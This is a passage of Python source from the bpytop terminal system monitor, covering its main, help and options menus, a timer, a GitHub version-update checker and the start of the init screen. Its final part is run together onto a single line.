            # Children except the last get "├─" connectors; the last gets "└─"
            children = tree[pid][:-1]
            for child in children:
                create_tree(child, tree, indent + " │ ", indent + " ├─ ", found=found, depth=depth+1, collapse_to=collapse_to)
            create_tree(tree[pid][-1], tree, indent + "  ", indent + " └─ ", depth=depth+1, collapse_to=collapse_to)

        create_tree(min(tree), tree)
        cls.det_cpu = det_cpu

        if cls.collect_interrupt:
            return
        # Periodically prune collapse-state entries for processes that no longer exist
        if cls.tree_counter >= 100:
            cls.tree_counter = 0
            for pid in list(cls.collapsed):
                if not psutil.pid_exists(pid):
                    del cls.collapsed[pid]
        cls.num_procs = len(out)
        cls.processes = out.copy()

    @classmethod
    def sorting(cls, key: str):
        '''Cycle the process sorting column left or right'''
        index: int = CONFIG.sorting_options.index(CONFIG.proc_sorting) + (1 if key == "right" else -1)
        if index >= len(CONFIG.sorting_options):
            index = 0
        elif index < 0:
            index = len(CONFIG.sorting_options) - 1
        CONFIG.proc_sorting = CONFIG.sorting_options[index]
        if "left" in Key.mouse:
            del Key.mouse["left"]
        Collector.collect(ProcCollector, interrupt=True, redraw=True)

    @classmethod
    def _draw(cls):
        ProcBox._draw_fg()

class Menu:
    '''Holds all menus'''
    active: bool = False
    close: bool = False
    resized: bool = True
    menus: Dict[str, Dict[str, str]] = {}
    menu_length: Dict[str, int] = {}
    background: str = ""

    # Pre-render every menu entry in both its "normal" and "selected" color variant
    for name, menu in MENUS.items():
        menu_length[name] = len(menu["normal"][0])
        menus[name] = {}
        for sel in ["normal", "selected"]:
            menus[name][sel] = ""
            for i in range(len(menu[sel])):
                menus[name][sel] += Fx.trans(f'{Color.fg(MENU_COLORS[sel][i])}{menu[sel][i]}')
                if i < len(menu[sel]) - 1:
                    menus[name][sel] += f'{Mv.d(1)}{Mv.l(len(menu[sel][i]))}'

    @classmethod
    def main(cls):
        '''Show the main menu and run its event loop until closed'''
        out: str = ""
        banner: str = ""
        redraw: bool = True
        key: str = ""
        mx: int = 0
        my: int = 0
        skip: bool = False
        mouse_over: bool = False
        mouse_items: Dict[str, Dict[str, int]] = {}
        cls.active = True
        cls.resized = True
        menu_names: List[str] = list(cls.menus.keys())
        menu_index: int = 0
        menu_current: str = menu_names[0]
        # Dimmed snapshot of the current screen used as menu backdrop
        cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
        while not cls.close:
            key = ""
            if cls.resized:
                banner = (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
                    f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
                if UpdateChecker.version != VERSION:
                    banner += f'{Mv.to(Term.height, 1)}{Fx.b}{THEME.title}New release 
{UpdateChecker.version} available at https://github.com/aristocratos/bpytop{Fx.ub}{Term.fg}'
                cy = 0
                # Compute clickable bounding boxes for each menu entry
                for name, menu in cls.menus.items():
                    ypos = Term.height // 2 - 2 + cy
                    xpos = Term.width // 2 - (cls.menu_length[name] // 2)
                    mouse_items[name] = { "x1" : xpos, "x2" : xpos + cls.menu_length[name] - 1, "y1" : ypos, "y2" : ypos + 2 }
                    cy += 3
                redraw = True
                cls.resized = False
            if redraw:
                out = ""
                for name, menu in cls.menus.items():
                    out += f'{Mv.to(mouse_items[name]["y1"], mouse_items[name]["x1"])}{menu["selected" if name == menu_current else "normal"]}'
            if skip and redraw:
                Draw.now(out)
            elif not skip:
                Draw.now(f'{cls.background}{banner}{out}')
            skip = redraw = False
            if Key.input_wait(Timer.left(), mouse=True):
                if Key.mouse_moved():
                    mx, my = Key.get_mouse()
                    for name, pos in mouse_items.items():
                        if pos["x1"] <= mx <= pos["x2"] and pos["y1"] <= my <= pos["y2"]:
                            mouse_over = True
                            if name != menu_current:
                                menu_current = name
                                menu_index = menu_names.index(name)
                                redraw = True
                            break
                    else:
                        mouse_over = False
                else:
                    key = Key.get()
                if key == "mouse_click" and not mouse_over:
                    key = "M"
                if key == "q":
                    clean_quit()
                elif key in ["escape", "M"]:
                    cls.close = True
                    break
                elif key in ["up", "mouse_scroll_up", "shift_tab"]:
                    menu_index -= 1
                    if menu_index < 0: menu_index = len(menu_names) - 1
                    menu_current = menu_names[menu_index]
                    redraw = True
                elif key in ["down", "mouse_scroll_down", "tab"]:
                    menu_index += 1
                    if menu_index > len(menu_names) - 1: menu_index = 0
                    menu_current = menu_names[menu_index]
                    redraw = True
                elif key == "enter" or (key == "mouse_click" and mouse_over):
                    if menu_current == "quit":
                        clean_quit()
                    elif menu_current == "options":
                        cls.options()
                        cls.resized = True
                    elif menu_current == "help":
                        cls.help()
                        cls.resized = True
            # Keep collectors running while the menu is open
            if Timer.not_zero() and not cls.resized:
                skip = True
            else:
                Collector.collect()
                Collector.collect_done.wait(2)
                if CONFIG.background_update:
                    cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
                Timer.stamp()

        Draw.now(f'{Draw.saved_buffer()}')
        cls.background = ""
        cls.active = False
        cls.close = False

    @classmethod
    def help(cls):
        '''Show the help window with keybindings and run its event loop until closed'''
        out: str = ""
        out_misc : str = ""
        redraw: bool = True
        key: str = ""
        skip: bool = False
        main_active: bool = cls.active
        cls.active = True
        cls.resized = True
        if not cls.background:
            cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
        # Keys starting with "_" are rendered as blank separator/footer rows
        help_items: Dict[str, str] = {
            "(Mouse 1)" : "Clicks buttons and selects in process list.",
            "Selected (Mouse 1)" : "Show detailed information for selected process.",
            "(Mouse scroll)" : "Scrolls any scrollable list/text under cursor.",
            "(Esc, shift+m)" : "Toggles main menu.",
            "(m)" : "Change current view mode, order full->proc->stat.",
            "(F2, o)" : "Shows options.",
            "(F1, h)" : "Shows this window.",
            "(ctrl+z)" : "Sleep program and put in background.",
            "(ctrl+c, q)" : "Quits program.",
            "(+) / (-)" : "Add/Subtract 100ms to/from update timer.",
            "(Up) (Down)" : "Select in process list.",
            "(Enter)" : "Show detailed information for selected process.",
            "(Spacebar)" : "Expand/collapse the selected process in tree view.",
            "(Pg Up) (Pg Down)" : "Jump 1 page in process list.",
            "(Home) (End)" : "Jump to first or last page in process list.",
            "(Left) (Right)" : "Select previous/next sorting column.",
            "(b) (n)" : "Select previous/next network device.",
            "(z)" : "Toggle totals reset for current network device",
            "(a)" : "Toggle auto scaling for the network graphs.",
            "(y)" : "Toggle synced scaling mode for network graphs.",
            "(f)" : "Input a string to filter processes with.",
            "(c)" : "Toggle per-core cpu usage of processes.",
            "(r)" : "Reverse sorting order in processes box.",
            "(e)" : "Toggle processes tree view.",
            "(delete)" : "Clear any entered filter.",
            "Selected (T, t)" : "Terminate selected process with SIGTERM - 15.",
            "Selected (K, k)" : "Kill selected process with SIGKILL - 9.",
            "Selected (I, i)" : "Interrupt selected process with SIGINT - 2.",
            "_1" : " ",
            "_2" : "For bug reporting and project updates, visit:",
            "_3" : "https://github.com/aristocratos/bpytop",
        }
        while not cls.close:
            key = ""
            if cls.resized:
                y = 8 if Term.height < len(help_items) + 10 else Term.height // 2 - len(help_items) // 2 + 4
                out_misc = (f'{Banner.draw(y-7, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
                    f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
                x = Term.width//2-36
                h, w = Term.height-2-y, 72
                # Paginate when the item list doesn't fit the terminal height
                if len(help_items) > h:
                    pages = ceil(len(help_items) / h)
                else:
                    h = len(help_items)
                    pages = 0
                page = 1
                out_misc += create_box(x, y, w, h+3, "help", line_color=THEME.div_line)
                redraw = True
                cls.resized = False
            if redraw:
                out = ""
                cy = 0
                if pages:
                    out += (f'{Mv.to(y, x+56)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
                        f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
                out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
                for n, (keys, desc) in enumerate(help_items.items()):
                    if pages and n < (page - 1) * h:
                        continue
                    out += f'{Mv.to(y+2+cy, x+1)}{Fx.b}{("" if keys.startswith("_") else keys):^20.20}{Fx.ub}{desc:50.50}'
                    cy += 1
                    if cy == h:
                        break
                if cy < h:
                    for i in range(h-cy):
                        out += f'{Mv.to(y+2+cy+i, x+1)}{" " * (w-2)}'
            if skip and redraw:
                Draw.now(out)
            elif not skip:
                Draw.now(f'{cls.background}{out_misc}{out}')
            skip = redraw = False
            if Key.input_wait(Timer.left()):
                key = Key.get()
                if key == "mouse_click":
                    mx, my = Key.get_mouse()
                    if x <= mx < x + w and y <= my < y + h + 3:
                        # Clicks on the "pg" up/down arrows in the title bar
                        if pages and my == y and x + 56 < mx < x + 61:
                            key = "up"
                        elif pages and my == y and x + 63 < mx < x + 68:
                            key = "down"
                    else:
                        key = "escape"
                if key == "q":
                    clean_quit()
                elif key in ["escape", "M", "enter", "backspace", "h", "f1"]:
                    cls.close = True
                    break
                elif key in ["up", "mouse_scroll_up", "page_up"] and pages:
                    page -= 1
                    if page < 1: page = pages
                    redraw = True
                elif key in ["down", "mouse_scroll_down", "page_down"] and pages:
                    page += 1
                    if page > pages: page = 1
                    redraw = True
            if Timer.not_zero() and not cls.resized:
                skip = True
            else:
                Collector.collect()
                Collector.collect_done.wait(2)
                if CONFIG.background_update:
                    cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
                Timer.stamp()

        if main_active:
            cls.close = False
            return
        Draw.now(f'{Draw.saved_buffer()}')
        cls.background = ""
        cls.active = False
        cls.close = False

    @classmethod
    def options(cls):
        '''Show the options window and run its event loop until closed'''
        out: str = ""
        out_misc : str = ""
        redraw: bool = True
        key: str = ""
        skip: bool = False
        main_active: bool = cls.active
        cls.active = True
        cls.resized = True
        d_quote: str
        inputting: bool = False
        input_val: str = ""
        global ARG_MODE
        Theme.refresh()
        if not cls.background:
            cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
        # Option name -> description lines shown in the side "description" box
        option_items: Dict[str, List[str]] = {
            "color_theme" : [
                'Set color theme.',
                '',
                'Choose from all theme files in',
                '"/usr/[local/]share/bpytop/themes" and',
                '"~/.config/bpytop/themes".',
                '',
                '"Default" for builtin default theme.',
                'User themes are prefixed by a plus sign "+".',
                '',
                'For theme updates see:',
                'https://github.com/aristocratos/bpytop'],
            "theme_background" : [
                'If the theme set background should be shown.',
                '',
                'Set to False if you want terminal background',
                'transparency.'],
            "view_mode" : [
                'Set bpytop view mode.',
                '',
                '"full" for everything shown.',
                '"proc" for cpu stats and processes.',
                '"stat" for cpu, mem, disks and net stats shown.'],
            "update_ms" : [
                'Update time in milliseconds.',
                '',
                'Recommended 2000 ms or above for better sample',
                'times for graphs.',
                '',
                'Min value: 100 ms',
                'Max value: 86400000 ms = 24 hours.'],
            "proc_sorting" : [
                'Processes sorting option.',
                '',
                'Possible values: "pid", "program", "arguments",',
                '"threads", "user", "memory", "cpu lazy" and',
                '"cpu responsive".',
                '',
                '"cpu lazy" updates top process over time,',
                '"cpu responsive" updates top process directly.'],
            "proc_reversed" : [
                'Reverse processes sorting order.',
                '',
                'True or False.'],
            "proc_tree" : [
                'Processes tree view.',
                '',
                'Set true to show processes grouped by parents,',
                'with lines drawn between parent and child',
                'process.'],
            "tree_depth" : [
                'Process tree auto collapse depth.',
                '',
                'Sets the depth were the tree view will auto',
                'collapse processes at.'],
            "proc_colors" : [
                'Enable colors in process view.',
                '',
                'Uses the cpu graph gradient colors.'],
            "proc_gradient" : [
                'Enable process view gradient fade.',
                '',
                'Fades from top or current selection.',
                'Max fade value is equal to current themes',
                '"inactive_fg" color value.'],
            "proc_per_core" : [
                'Process usage per core.',
                '',
                'If process cpu usage should be of the core',
                'it\'s running on or usage of the total',
                'available cpu power.',
                '',
                'If true and process is multithreaded',
                'cpu usage can reach over 100%.'],
            "proc_mem_bytes" : [
                'Show memory as bytes in process list.',
                ' ',
                'True or False.'
            ],
            "check_temp" : [
                'Enable cpu temperature reporting.',
                '',
                'True or False.'],
            "cpu_sensor" : [
                'Cpu temperature sensor',
                '',
                'Select the sensor that corresponds to',
                'your cpu temperature.',
                'Set to "Auto" for auto detection.'],
            "show_coretemp" : [
                'Show temperatures for cpu cores.',
                '',
                'Only works if check_temp is True and',
                'the system is reporting core temps.'],
            "draw_clock" : [
                'Draw a clock at top of screen.',
                '',
                'Formatting according to strftime, empty',
                'string to disable.',
                '',
                'Custom formatting options:',
                '"/host" = hostname',
                '"/user" = username',
                '',
                'Examples of strftime formats:',
                '"%X" = locale HH:MM:SS',
                '"%H" = 24h hour, "%I" = 12h hour',
                '"%M" = minute, "%S" = second',
                '"%d" = day, "%m" = month, "%y" = year'],
            "background_update" : [
                'Update main ui when menus are showing.',
                '',
                'True or False.',
                '',
                'Set this to false if the menus is flickering',
                'too much for a comfortable experience.'],
            "custom_cpu_name" : [
                'Custom cpu model name in cpu percentage box.',
                '',
                'Empty string to disable.'],
            "disks_filter" : [
                'Optional filter for shown disks.',
                '',
                'Should be full path of a mountpoint,',
                '"root" replaces "/", separate multiple values',
                'with a comma ",".',
                'Begin line with "exclude=" to change to exclude',
                'filter.',
                'Oterwise defaults to "most include" filter.',
                '',
                'Example: disks_filter="exclude=/boot, /home/user"'],
            "mem_graphs" : [
                'Show graphs for memory values.',
                '',
                'True or False.'],
            "show_swap" : [
                'If swap memory should be shown in memory box.',
                '',
                'True or False.'],
            "swap_disk" : [
                'Show swap as a disk.',
                '',
                'Ignores show_swap value above.',
                'Inserts itself after first disk.'],
            "show_disks" : [
                'Split memory box to also show disks.',
                '',
                'True or False.'],
            "net_download" : [
                'Fixed network graph download value.',
                '',
                'Default "10M" = 10 MibiBytes.',
                'Possible units:',
                '"K" (KiB), "M" (MiB), "G" (GiB).',
                '',
                'Append "bit" for bits instead of bytes,',
                'i.e "100Mbit"',
                '',
                'Can be toggled with auto button.'],
            "net_upload" : [
                'Fixed network graph upload value.',
                '',
                'Default "10M" = 10 MibiBytes.',
                'Possible units:',
                '"K" (KiB), "M" (MiB), "G" (GiB).',
                '',
                'Append "bit" for bits instead of bytes,',
                'i.e "100Mbit"',
                '',
                'Can be toggled with auto button.'],
            "net_auto" : [
                'Start in network graphs auto rescaling mode.',
                '',
                'Ignores any values set above at start and',
                'rescales down to 10KibiBytes at the lowest.',
                '',
                'True or False.'],
            "net_sync" : [
                'Network scale sync.',
                '',
                'Syncs the scaling for download and upload to',
                'whichever currently has the highest scale.',
                '',
                'True or False.'],
            "net_color_fixed" : [
                'Set network graphs color gradient to fixed.',
                '',
                'If True the network graphs color is based',
                'on the total bandwidth usage instead of',
                'the current autoscaling.',
                '',
                'The bandwidth usage is based on the',
                '"net_download" and "net_upload" values set',
                'above.'],
            "show_battery" : [
                'Show battery stats.',
                '',
                'Show battery stats in the top right corner',
                'if a battery is present.'],
            "show_init" : [
                'Show init screen at startup.',
                '',
                'The init screen is purely cosmetical and',
                'slows down start to show status messages.'],
            "update_check" : [
                'Check for updates at start.',
                '',
                'Checks for latest version from:',
                'https://github.com/aristocratos/bpytop'],
            "log_level" : [
                'Set loglevel for error.log',
                '',
                'Levels are: "ERROR" "WARNING" "INFO" "DEBUG".',
                'The level set includes all lower levels,',
                'i.e. "DEBUG" will show all logging info.']
        }
        # Each option occupies 2 rows (name row + value row)
        option_len: int = len(option_items) * 2
        sorting_i: int = CONFIG.sorting_options.index(CONFIG.proc_sorting)
        loglevel_i: int = CONFIG.log_levels.index(CONFIG.log_level)
        view_mode_i: int = CONFIG.view_modes.index(CONFIG.view_mode)
        cpu_sensor_i: int = CONFIG.cpu_sensors.index(CONFIG.cpu_sensor)
        color_i: int
        while not cls.close:
            key = ""
            if cls.resized:
                y = 9 if Term.height < option_len + 10 else Term.height // 2 - option_len // 2 + 4
                out_misc = (f'{Banner.draw(y-7, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
                    f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
                x = Term.width//2-38
                x2 = x + 27
                h, w, w2 = Term.height-2-y, 26, 50
                h -= h % 2
                color_i = list(Theme.themes).index(THEME.current)
                if option_len > h:
                    pages = ceil(option_len / h)
                else:
                    h = option_len
                    pages = 0
                page = 1
                selected_int = 0
                out_misc += create_box(x, y, w, h+2, "options", line_color=THEME.div_line)
                redraw = True
                cls.resized = False
            if redraw:
                out = ""
                cy = 0
                selected = list(option_items)[selected_int]
                if pages:
                    out += (f'{Mv.to(y+h+1, x+11)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
                        f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
                #out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
                for n, opt in enumerate(option_items):
                    if pages and n < (page - 1) * ceil(h / 2):
                        continue
                    value = getattr(CONFIG, opt)
                    t_color = f'{THEME.selected_bg}{THEME.selected_fg}' if opt == selected else f'{THEME.title}'
                    v_color = "" if opt == selected else f'{THEME.title}'
                    d_quote = '"' if isinstance(value, str) else ""
                    # "x/y" counter suffix for cyclable multi-choice options
                    if opt == "color_theme":
                        counter = f' {color_i + 1}/{len(Theme.themes)}'
                    elif opt == "proc_sorting":
                        counter = f' {sorting_i + 1}/{len(CONFIG.sorting_options)}'
                    elif opt == "log_level":
                        counter = f' {loglevel_i + 1}/{len(CONFIG.log_levels)}'
                    elif opt == "view_mode":
                        counter = f' {view_mode_i + 1}/{len(CONFIG.view_modes)}'
                    elif opt == "cpu_sensor":
                        counter = f' {cpu_sensor_i + 1}/{len(CONFIG.cpu_sensors)}'
                    else:
                        counter = ""
                    out += f'{Mv.to(y+1+cy, x+1)}{t_color}{Fx.b}{opt.replace("_", " ").capitalize() + counter:^24.24}{Fx.ub}{Mv.to(y+2+cy, x+1)}{v_color}'
                    if opt == selected:
                        if isinstance(value, bool) or opt in ["color_theme", "proc_sorting", "log_level", "view_mode", "cpu_sensor"]:
                            out += f'{t_color} {Symbol.left}{v_color}{d_quote + str(value) + d_quote:^20.20}{t_color}{Symbol.right} '
                        elif inputting:
                            out += f'{str(input_val)[-17:] + Fx.bl + "█" + Fx.ubl + "" + Symbol.enter:^33.33}'
                        else:
                            out += ((f'{t_color} {Symbol.left}{v_color}' if type(value) is int else " ") + f'{str(value) + " " + Symbol.enter:^20.20}' + (f'{t_color}{Symbol.right} ' if type(value) is int else " "))
                    else:
                        out += f'{d_quote + str(value) + d_quote:^24.24}'
                    out += f'{Term.bg}'
                    if opt == selected:
                        # Description box next to the selected option
                        h2 = len(option_items[opt]) + 2
                        y2 = y + (selected_int * 2) - ((page-1) * h)
                        if y2 + h2 > Term.height: y2 = Term.height - h2
                        out += f'{create_box(x2, y2, w2, h2, "description", line_color=THEME.div_line)}{THEME.main_fg}'
                        for n, desc in enumerate(option_items[opt]):
                            out += f'{Mv.to(y2+1+n, x2+2)}{desc:.48}'
                    cy += 2
                    if cy >= h:
                        break
                if cy < h:
                    for i in range(h-cy):
                        out += f'{Mv.to(y+1+cy+i, x+1)}{" " * (w-2)}'
            if not skip or redraw:
                Draw.now(f'{cls.background}{out_misc}{out}')
            skip = redraw = False
            if Key.input_wait(Timer.left()):
                key = Key.get()
                redraw = True
                has_sel = False
                if key == "mouse_click" and not inputting:
                    mx, my = Key.get_mouse()
                    if x < mx < x + w and y < my < y + h + 2:
                        mouse_sel = ceil((my - y) / 2) - 1 + ceil((page-1) * (h / 2))
                        if pages and my == y+h+1 and x+11 < mx < x+16:
                            key = "page_up"
                        elif pages and my == y+h+1 and x+19 < mx < x+24:
                            key = "page_down"
                        elif my == y+h+1:
                            pass
                        elif mouse_sel == selected_int:
                            # Clicking the already-selected row acts on its value
                            if mx < x + 6:
                                key = "left"
                            elif mx > x + 19:
                                key = "right"
                            else:
                                key = "enter"
                        elif mouse_sel < len(option_items):
                            selected_int = mouse_sel
                            has_sel = True
                    else:
                        key = "escape"
                if inputting:
                    # Text/number entry mode for free-form options
                    if key in ["escape", "mouse_click"]:
                        inputting = False
                    elif key == "enter":
                        inputting = False
                        if str(getattr(CONFIG, selected)) != input_val:
                            if selected == "update_ms":
                                if not input_val or int(input_val) < 100:
                                    CONFIG.update_ms = 100
                                elif int(input_val) > 86399900:
                                    CONFIG.update_ms = 86399900
                                else:
                                    CONFIG.update_ms = int(input_val)
                            elif selected == "tree_depth":
                                if not input_val or int(input_val) < 0:
                                    CONFIG.tree_depth = 0
                                else:
                                    CONFIG.tree_depth = int(input_val)
                                ProcCollector.collapsed = {}
                            elif isinstance(getattr(CONFIG, selected), str):
                                setattr(CONFIG, selected, input_val)
                                if selected.startswith("net_"):
                                    NetCollector.net_min = {"download" : -1, "upload" : -1}
                                elif selected == "draw_clock":
                                    Box.clock_on = len(CONFIG.draw_clock) > 0
                                    if not Box.clock_on: Draw.clear("clock", saved=True)
                            Term.refresh(force=True)
                            cls.resized = False
                    elif key == "backspace" and len(input_val):
                        input_val = input_val[:-1]
                    elif key == "delete":
                        input_val = ""
                    elif isinstance(getattr(CONFIG, selected), str) and len(key) == 1:
                        input_val += key
                    elif isinstance(getattr(CONFIG, selected), int) and key.isdigit():
                        input_val += key
                elif key == "q":
                    clean_quit()
                elif key in ["escape", "o", "M", "f2"]:
                    cls.close = True
                    break
                elif key == "enter" and selected in ["update_ms", "disks_filter", "custom_cpu_name", "net_download", "net_upload", "draw_clock", "tree_depth"]:
                    inputting = True
                    input_val = str(getattr(CONFIG, selected))
                elif key == "left" and selected == "update_ms" and CONFIG.update_ms - 100 >= 100:
                    CONFIG.update_ms -= 100
                    Box.draw_update_ms()
                elif key == "right" and selected == "update_ms" and CONFIG.update_ms + 100 <= 86399900:
                    CONFIG.update_ms += 100
                    Box.draw_update_ms()
                elif key == "left" and selected == "tree_depth" and CONFIG.tree_depth > 0:
                    CONFIG.tree_depth -= 1
                    ProcCollector.collapsed = {}
                elif key == "right" and selected == "tree_depth":
                    CONFIG.tree_depth += 1
                    ProcCollector.collapsed = {}
                elif key in ["left", "right"] and isinstance(getattr(CONFIG, selected), bool):
                    # Boolean options toggle on either arrow
                    setattr(CONFIG, selected, not getattr(CONFIG, selected))
                    if selected == "check_temp":
                        if CONFIG.check_temp:
                            CpuCollector.get_sensors()
                        else:
                            CpuCollector.sensor_method = ""
                            CpuCollector.got_sensors = False
                    if selected in ["net_auto", "net_color_fixed", "net_sync"]:
                        if selected == "net_auto": NetCollector.auto_min = CONFIG.net_auto
                        NetBox.redraw = True
                    if selected == "theme_background":
                        Term.bg = f'{THEME.main_bg}' if CONFIG.theme_background else "\033[49m"
                        Draw.now(Term.bg)
                    if selected == "show_battery":
                        Draw.clear("battery", saved=True)
                    Term.refresh(force=True)
                    cls.resized = False
                elif key in ["left", "right"] and selected == "color_theme" and len(Theme.themes) > 1:
                    if key == "left":
                        color_i -= 1
                        if color_i < 0: color_i = len(Theme.themes) - 1
                    elif key == "right":
                        color_i += 1
                        if color_i > len(Theme.themes) - 1: color_i = 0
                    Collector.collect_idle.wait()
                    CONFIG.color_theme = list(Theme.themes)[color_i]
                    THEME(CONFIG.color_theme)
                    Term.refresh(force=True)
                    Timer.finish()
                elif key in ["left", "right"] and selected == "proc_sorting":
                    ProcCollector.sorting(key)
                elif key in ["left", "right"] and selected == "log_level":
                    if key == "left":
                        loglevel_i -= 1
                        if loglevel_i < 0: loglevel_i = len(CONFIG.log_levels) - 1
                    elif key == "right":
                        loglevel_i += 1
                        if loglevel_i > len(CONFIG.log_levels) - 1: loglevel_i = 0
                    CONFIG.log_level = CONFIG.log_levels[loglevel_i]
                    errlog.setLevel(getattr(logging, CONFIG.log_level))
                    errlog.info(f'Loglevel set to {CONFIG.log_level}')
                elif key in ["left", "right"] and selected == "cpu_sensor" and len(CONFIG.cpu_sensors) > 1:
                    if key == "left":
                        cpu_sensor_i -= 1
                        if cpu_sensor_i < 0: cpu_sensor_i = len(CONFIG.cpu_sensors) - 1
                    elif key == "right":
                        cpu_sensor_i += 1
                        if cpu_sensor_i > len(CONFIG.cpu_sensors) - 1: cpu_sensor_i = 0
                    Collector.collect_idle.wait()
                    CpuCollector.sensor_swap = True
                    CONFIG.cpu_sensor = CONFIG.cpu_sensors[cpu_sensor_i]
                    if CONFIG.check_temp and (CpuCollector.sensor_method != "psutil" or CONFIG.cpu_sensor == "Auto"):
                        CpuCollector.get_sensors()
                    Term.refresh(force=True)
                    cls.resized = False
                elif key in ["left", "right"] and selected == "view_mode":
                    if key == "left":
                        view_mode_i -= 1
                        if view_mode_i < 0: view_mode_i = len(CONFIG.view_modes) - 1
                    elif key == "right":
                        view_mode_i += 1
                        if view_mode_i > len(CONFIG.view_modes) - 1: view_mode_i = 0
                    CONFIG.view_mode = CONFIG.view_modes[view_mode_i]
                    Box.proc_mode = CONFIG.view_mode == "proc"
                    Box.stat_mode = CONFIG.view_mode == "stat"
                    if ARG_MODE:
                        ARG_MODE = ""
                    Draw.clear(saved=True)
                    Term.refresh(force=True)
                    cls.resized = False
                elif key == "up":
                    selected_int -= 1
                    if selected_int < 0: selected_int = len(option_items) - 1
                    page = floor(selected_int * 2 / h) + 1
                elif key == "down":
                    selected_int += 1
                    if selected_int > len(option_items) - 1: selected_int = 0
                    page = floor(selected_int * 2 / h) + 1
                elif key in ["mouse_scroll_up", "page_up"] and pages:
                    page -= 1
                    if page < 1: page = pages
                    selected_int = (page-1) * ceil(h / 2)
                elif key in ["mouse_scroll_down", "page_down"] and pages:
                    page += 1
                    if page > pages: page = 1
                    selected_int = (page-1) * ceil(h / 2)
                elif has_sel:
                    pass
                else:
                    redraw = False
            if Timer.not_zero() and not cls.resized:
                skip = True
            else:
                Collector.collect()
                Collector.collect_done.wait(2)
                if CONFIG.background_update:
                    cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
                Timer.stamp()

        if main_active:
            cls.close = False
            return
        Draw.now(f'{Draw.saved_buffer()}')
        cls.background = ""
        cls.active = False
        cls.close = False

# --- fragment: class Timer continues past the end of this chunk ---
class Timer:
    timestamp: float
    return_zero = False

    @classmethod
    def stamp(cls):
        cls.timestamp = time()

    @classmethod
    def not_zero(cls) -> bool:
        if
cls.return_zero: cls.return_zero = False return False return cls.timestamp + (CONFIG.update_ms / 1000) > time() @classmethod def left(cls) -> float: return cls.timestamp + (CONFIG.update_ms / 1000) - time() @classmethod def finish(cls): cls.return_zero = True cls.timestamp = time() - (CONFIG.update_ms / 1000) Key.break_wait() class UpdateChecker: version: str = VERSION thread: threading.Thread @classmethod def run(cls): cls.thread = threading.Thread(target=cls._checker) cls.thread.start() @classmethod def _checker(cls): try: with urllib.request.urlopen("https://github.com/aristocratos/bpytop/raw/master/bpytop.py", timeout=5) as source: # type: ignore for line in source: line = line.decode("utf-8") if line.startswith("VERSION: str ="): cls.version = line[(line.index("=")+1):].strip('" \n') break except Exception as e: errlog.exception(f'{e}') else: if cls.version != VERSION and which("notify-send"): try: subprocess.run(["notify-send", "-u", "normal", "BpyTop Update!", f'New version of BpyTop available!\nCurrent version: {VERSION}\nNew version: {cls.version}\nDownload at github.com/aristocratos/bpytop', "-i", "update-notifier", "-t", "10000"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) except Exception as e: errlog.exception(f'{e}') class Init: running: bool = True initbg_colors: List[str] = [] initbg_data: List[int] initbg_up: Graph initbg_down: Graph resized = False @classmethod def start(cls): Draw.buffer("init", z=1) Draw.buffer("initbg", z=10) for i in range(51): for _ in range(2): cls.initbg_colors.append(Color.fg(i, i, i)) Draw.buffer("banner", (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(11)}{Colors.black_bg}{Colors.default}' f'{Fx.b}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}{Color.fg("#50")}'), z=2) for _i in range(7): perc = f'{str(round((_i + 1) * 14 + 2)) + "%":>5}' Draw.buffer("+banner", f'{Mv.to(Term.height // 2 - 2 + _i, Term.width // 2 - 28)}{Fx.trans(perc)}{Symbol.v_line}') Draw.out("banner") 
